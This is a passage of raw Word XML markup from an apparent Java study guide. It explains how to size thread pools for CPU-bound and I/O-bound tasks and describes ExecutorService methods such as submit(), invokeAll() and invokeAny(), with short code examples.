        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5039765F" w14:textId="77777777" w:rsidR="003144C5" w:rsidRPr="00CE4B95" w:rsidRDefault="003144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180165"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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cpuCou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unti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Runti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vailableProcessors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC1433C" w14:textId="08F4E4D1" w:rsidR="003144C5" w:rsidRPr="00CE4B95" w:rsidRDefault="003144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180165"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executo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PoolExecut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puCou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puCou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imeUni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ILLISECOND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nkedBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D26264" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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or I/O-bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: You can increase the thread pool size. A common rule is to set the pool size to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2 to 3 times the number of CPU cores</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially if tasks are blocking on I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E667F5" w14:textId="77777777" w:rsidR="003144C5" w:rsidRPr="00CE4B95" w:rsidRDefault="003144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5606681"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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cpuCou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unti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Runti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vailableProcessors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54158165" w14:textId="749EEDC6" w:rsidR="003144C5" w:rsidRPr="00CE4B95" w:rsidRDefault="003144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5606681"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executo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PoolExecut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cpuCou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puCou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imeUni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ILLISECOND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nkedBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D79DD6" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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dditional Factors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCED123" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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ask Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3A26F9" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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hort-running tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the tasks are short-lived, you might get away with a smaller pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF5F0A8" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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ng-running tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For tasks that take a long time, increasing the number of threads might help to keep the CPU busy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1E1A78" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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ystem Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA6BB3" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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ving too many threads can lead to context switching overhead and can strain the system resources (memory, CPU, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C328079" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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optimal number of threads should also consider available system resources. Too many threads can degrade performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877A8FB" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7EB2FD" w14:textId="77777777" w:rsidR="009E5A01" w:rsidRPr="00CE4B95" w:rsidRDefault="009E5A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514887"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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cpuCou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unti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Runti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vailableProcessors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA586EC" w14:textId="77777777" w:rsidR="009E5A01" w:rsidRPr="00CE4B95" w:rsidRDefault="009E5A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514887"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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poolSiz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puCou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For I/O-bound tasks, or you can adjust based on testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236050B" w14:textId="77777777" w:rsidR="009E5A01" w:rsidRPr="00CE4B95" w:rsidRDefault="009E5A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514887"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executo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PoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6C53C1" w14:textId="77777777" w:rsidR="009E5A01" w:rsidRPr="00CE4B95" w:rsidRDefault="009E5A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514887"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    poolSiz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oolSiz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60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imeUni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ECOND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nkedBlockingQueue</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Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F224A1" w14:textId="1C91D93E" w:rsidR="009E5A01" w:rsidRPr="00CE4B95" w:rsidRDefault="009E5A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514887"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080168AB" w14:textId="77777777" w:rsidR="009E5A01" w:rsidRPr="00CE4B95" w:rsidRDefault="009E5A01" w:rsidP="003525F3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F213906" w14:textId="5315D7B7" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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Monitoring and Tuning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38959876" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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nchmarking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It's essential to test and benchmark different thread pool sizes for your specific workload. Sometimes, tuning parameters like keepAliveTime and queue size also matter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06B551" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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oad Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Under high loads, you may need to adjust the pool size dynamically or adjust based on the system's behavior (e.g., monitoring queue size or thread utilization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4266C515" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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7BA39C9A" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tasks: Set the thread pool size to the number of available CPU cores (cpuCount).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBBC850" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I/O-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tasks: Set the thread pool size to around </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2 to 3 times the number of CPU cores</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15009562" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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est and monitor your system to find the most efficient configuration based on the task type and workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA05D08" w14:textId="02662F79" w:rsidR="00423158" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00423158">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C610E17">
          <v:rect id="_x0000_i1848" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB8B4F" w14:textId="77777777" w:rsidR="002B412F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B412F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="280" w:name="_Toc196307760"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are thread pool methods?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="280"/>
    </w:p>
    <w:p w14:paraId="2FCA7FF3" w14:textId="041DE9E7" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Thread pool methods in Java are provided by the ExecutorService interface, which is a higher-level replacement for the traditional way of handling threads manually. These methods help in managing and controlling the execution of tasks in the thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B49AC" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Common Thread Pool Methods in Java (from ExecutorService interface):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E660E66" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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submit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C431A65"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method is used to submit a task (usually a Runnable or Callable) for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35588F80"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Return Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Future&lt;T&gt;: A Future object is returned, which represents the result of an asynchronous computation. It allows you to check if the task is complete, wait for its completion, or retrieve the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2185F040"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5E9D6B"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ExecutorService executor = Executors.newFixedThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC9E75E"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Future&lt;?&gt; future = executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDBE49"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 xml:space="preserve">    // Task to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5039FF1D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCDA78" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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invokeAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E560CC2"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method takes a collection of tasks (like a list of Callable objects) and executes them. It blocks until all the tasks are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163415D1"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Return Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> List&lt;Future&lt;T&gt;&gt;: A list of Future objects representing the results of the submitted tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6735B443"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251572B" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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List&lt;Callable&lt;Integer&gt;&gt; tasks = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589C484" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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tasks.add(() -&gt; 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144E920" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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tasks.add(() -&gt; 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB03D0D" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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ExecutorService executor = Executors.newFixedThreadPool(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6323000D" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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List&lt;Future&lt;Integer&gt;&gt; results = executor.invokeAll(tasks);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C5D4F4" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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lastRenderedPageBreak/>
        <w:t>invokeAny()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50877380"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Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method executes a collection of tasks (usually Callable objects) and returns the result of the first successfully completed task. If no task completes successfully (throws an exception), it will throw an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7766CDB0"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Return Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B01">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> T: The result of the first completed task (if successful).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDD11F"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C7996" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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List&lt;Callable&lt;Integer&gt;&gt; tasks = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D515BD7" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
        <w:ind w:left="2160"/>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tasks.add(() -&gt; 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253D139C" w14:textId="77777777" w:rsidR="00BB1F8E" w:rsidRPr="00D50B01" w:rsidRDefault="00BB1F8E" w:rsidP="00D50B01">
      <w:pPr>
